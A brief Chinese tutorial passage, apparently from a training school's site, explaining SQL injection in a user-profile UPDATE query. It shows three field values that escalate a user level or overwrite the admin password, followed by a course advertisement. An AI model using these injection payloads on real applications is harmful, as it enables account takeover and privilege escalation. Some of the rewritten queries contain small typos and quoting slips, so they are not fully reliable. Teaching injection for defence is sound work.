先理解这句SQL: UPDATE user SET password='MD5($password)',homepage='$homepage' WHERE id='$id'如果此SQL被修改成以下形式,就实现了注入。
1、修改homepage 值为http://xxx.net/', userlevel='3之后SQL语句变为:UPDATE user SET password='mypass',homepage='http://xxx.net/', userlevel='3' WHERE id='$id'userlevel 为用户级别
2、修改 password 值为mypass)' WHERE username='admin'#之后SQL语句变为:UPDATE user SET password='MD5(mypass)' WHEREusername='admin'#)', homepage='$homepage' WHERE id='$id'3、修改 id 值为'OR username='admin'之后SQL语句变为: UPDATE user SET password='MD5($password)',homepage='$homepage' WHERE id="OR username='admin'
更多关于“网络安全培训”的问题,欢迎咨询千锋教育在线名师。千锋教育多年办学,课程大纲紧跟企业需求,更科学更严谨,每年培养泛IT人才近2万人。不论你是零基础还是想提升,都可以找到适合的班型,千锋教育随时欢迎你来试听。
京公网安备 11010802030320号